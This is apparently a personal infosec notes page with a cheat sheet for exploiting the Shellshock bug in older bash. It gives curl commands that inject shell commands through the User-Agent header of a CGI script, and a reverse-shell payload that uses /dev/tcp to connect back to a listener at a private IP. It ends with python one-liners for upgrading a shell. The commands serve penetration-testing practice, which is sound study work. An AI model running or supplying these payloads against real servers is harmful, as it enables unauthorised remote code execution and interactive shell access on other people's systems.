akde/infosec

Information security is ultimately about managing risk

Shellshock

Older bash versions may execute code after function definitions.

Via command line

export newfunction='() { echo 'shellshockdemo';}; echo vulnerable'

Via a web server / CGI script

Caution: Try the reverse shell example in Burp also if the curl command fails!

curl http://$target/cgi-bin/admin.cgi -s > before
curl -H "User-Agent: () { :; }; /bin/bash -c 'id; pwd; whoami 2>&1;'" http://$target/cgi-bin/admin.cgi -s >  after
diff before after

Remember to redirect stderr if something doesn’t work as expected!

Getting a reverse shell

nc -lvp 443
curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.119.158/443 0>&1;'" http://$target/cgi-bin/admin.cgi -s

Leave a Reply Cancel reply

You must be logged in to post a comment.

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';